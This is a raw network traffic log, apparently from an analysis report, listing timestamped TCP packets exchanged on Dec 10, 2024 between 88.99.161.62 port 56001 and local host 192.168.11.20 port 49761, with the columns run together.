                                                                              Dec 10, 2024 07:01:05.260246992 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260272980 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260293961 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260315895 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260338068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260353088 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260360003 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260384083 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260385036 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260412931 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260478020 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260555983 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260585070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260615110 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260637045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260659933 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260685921 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260710001 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260735989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260744095 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260757923 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260780096 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260799885 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260822058 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260831118 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260831118 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260843039 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260869026 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260900021 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260922909 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260940075 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260946989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260970116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260991096 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261013031 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261015892 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261049032 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261049032 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261159897 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261176109 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261176109 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261184931 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261207104 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261228085 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261250019 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261281967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261310101 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261331081 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261353016 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261369944 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261369944 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261374950 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.261406898 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261512041 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.261594057 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.479348898 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479621887 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479664087 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479703903 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479739904 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479770899 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479799986 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479835033 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479867935 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.479867935 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.479883909 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479923010 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.479957104 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.479986906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480016947 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480022907 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480046034 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480076075 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480104923 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480134010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480163097 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480192900 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480191946 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480221987 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480237007 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480252028 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480282068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480310917 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480319023 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480319023 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480339050 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480366945 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480370045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.480439901 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.480557919 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481206894 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481245041 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481287956 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481327057 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481355906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481384993 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481389046 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481442928 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481486082 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481511116 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481522083 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481569052 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481616020 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481648922 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481664896 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481693029 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481710911 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481760979 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481792927 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481811047 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481854916 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481901884 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.481945992 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.481951952 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482001066 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482045889 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482053041 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482081890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482086897 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482110977 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482140064 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482155085 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482155085 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482168913 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482198000 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482275009 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482279062 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482320070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482326984 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482355118 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482398033 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482426882 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482456923 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482460022 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482494116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482506037 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482528925 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482554913 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482563019 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482599974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482604027 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482642889 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482681990 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482711077 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482739925 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482745886 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482769012 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482816935 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482831955 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482871056 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482872009 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482903957 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482916117 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.482933044 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482963085 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482991934 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.482992887 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483031034 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483056068 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483067036 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483099937 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483120918 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483138084 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483182907 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483189106 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483212948 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483243942 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483292103 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483328104 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483331919 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483366966 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483402967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483432055 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483444929 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483463049 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483491898 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483494043 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483520985 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483550072 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483551979 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483580112 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483623981 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.483680964 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.483761072 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.699538946 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.699835062 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.699875116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.699906111 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.699935913 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.699965000 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700009108 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700045109 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700076103 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700081110 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700108051 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700128078 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700145006 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700181007 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700201988 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700218916 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700246096 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700267076 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700319052 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700370073 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700417995 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700455904 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700484991 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700484991 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700495005 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700536966 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700581074 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700606108 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700628042 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700664997 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700692892 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700721979 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700750113 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700769901 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700778961 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700809002 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700814009 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700856924 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700895071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700910091 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700942039 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.700953960 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.700975895 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701004982 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701045036 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701051950 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701093912 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701124907 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701144934 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701153994 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701183081 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701212883 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701241970 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701240063 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701241016 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701277971 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701314926 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701351881 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701364040 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701380968 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701407909 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701411009 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701440096 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701468945 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701494932 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701503992 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.701535940 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701605082 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.701683998 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703156948 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703203917 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703255892 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703448057 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703464031 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703514099 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703555107 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703592062 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703627110 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703634977 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703677893 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703677893 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703726053 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703768969 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703799963 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703821898 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703830957 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703860044 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703866005 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703888893 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703926086 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703952074 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.703959942 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703993082 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.703994989 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704021931 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704062939 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704066992 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704102039 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704130888 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704159021 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704174042 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704188108 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704216957 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704237938 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704237938 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704246044 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704276085 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704304934 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704333067 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704334974 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704360962 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704390049 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704394102 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704418898 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704447985 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704449892 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704476118 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704504967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704519987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704534054 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704562902 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704569101 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704591990 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704619884 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704639912 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704649925 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704667091 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704679966 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704715967 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704716921 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704751968 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704765081 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704787016 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704817057 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704854965 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704863071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704906940 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704937935 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.704969883 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.704982042 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705018997 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705049038 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705049038 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705054998 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705091953 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705126047 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705144882 CET4976156001192.168.11.2088.99.161.62
